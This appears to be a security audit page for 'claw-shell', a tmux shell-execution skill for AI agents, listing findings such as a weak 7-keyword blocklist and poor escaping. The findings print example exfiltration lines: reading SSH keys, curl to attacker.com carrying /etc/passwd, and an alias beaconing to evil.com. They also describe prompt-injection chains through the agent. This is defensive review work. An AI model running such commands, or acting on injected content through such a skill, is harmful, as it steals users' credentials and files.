Is claw-shell safe?

https://clawhub.ai/imaginelogo/claw-shell

52
CAUTION

claw-shell is a tmux-based shell execution skill that provides the agent with effectively unrestricted command-line access. While the skill itself contains no malicious code, its isDangerous() safeguard is trivially bypassable and covers only 7 keywords. The skill has no sandboxing, no file access restrictions, no network egress controls, and insufficient command escaping — making it a powerful execution primitive for any attack chain. Installation was clean with no malicious clone behavior detected.

Category Scores

Category · Score · Weight
Prompt Injection · 75/100 · 30%
Data Exfiltration · 45/100 · 25%
Code Execution · 20/100 · 20%
Clone Behavior · 80/100 · 10%
Canary Integrity · 100/100 · 10%
Behavioral Reasoning · 25/100 · 5%

Findings (8)

CRITICAL Unrestricted arbitrary shell command execution -60

handler.js executes any command passed to it via execSync through tmux with no sandboxing, no allowlist, and no directory restrictions. The isDangerous() blocklist checks only 7 keywords and is trivially bypassable. This gives the agent — and anything that can influence the agent's input — full shell access.

HIGH Insufficient command escaping enables injection -20

The sendCommand() function escapes only double quotes in the command string. Shell metacharacters such as $(), backticks, semicolons, pipes (|), and logical operators (&&, ||) pass through unmodified. An attacker who can influence the command parameter can therefore chain arbitrary commands.

HIGH No restrictions on reading sensitive files or exfiltrating data -55

The skill places no restrictions on which files can be read or where data can be sent. Commands like 'cat ~/.ssh/id_rsa', 'cat .env', or 'curl https://attacker.com/?d=$(cat /etc/passwd)' are not blocked by the isDangerous() check. Any data read flows back through tmux capture-pane into the agent context.

MEDIUM Example normalizes arbitrary URL fetching via shell -15

The EXAMPLES section includes 'bird read https://x.com/...' as a SAFE example, training the agent to accept fetching arbitrary URLs through the shell as normal behavior. This could be leveraged by prompt injection in other skills to exfiltrate data via URL parameters.

MEDIUM ALL-CAPS imperative directives condition agent behavior -10

SKILL.md uses aggressive ALL-CAPS formatting (ALWAYS, NEVER, DO NOT RUN) which, while within scope, conditions the agent to treat the skill's instructions as high-priority overrides. This styling pattern can make the agent more susceptible to similar formatting in attacker-controlled content.

MEDIUM Persistent tmux session enables cross-invocation state attacks -25

The tmux session 'claw' persists across skill invocations. An attacker could set shell aliases, environment variables, or background processes in one invocation that activate in later invocations. For example: alias ls='ls; curl https://evil.com/?pwd=$(pwd)' would silently exfiltrate on every subsequent ls call.

LOW Fixed 500ms delay creates race condition -5

The handler waits a fixed 500ms before reading tmux output. Commands that take longer than that return stale or partial output, potentially causing the agent to misinterpret results, retry commands, or take incorrect follow-up actions.

INFO SSH host key reads are from sshd, not skill -5

Filesystem monitoring captured reads of /etc/ssh/ssh_host_*_key files. These are from the sshd process handling the SSH connection used for installation, not from the skill itself. This is expected VM behavior.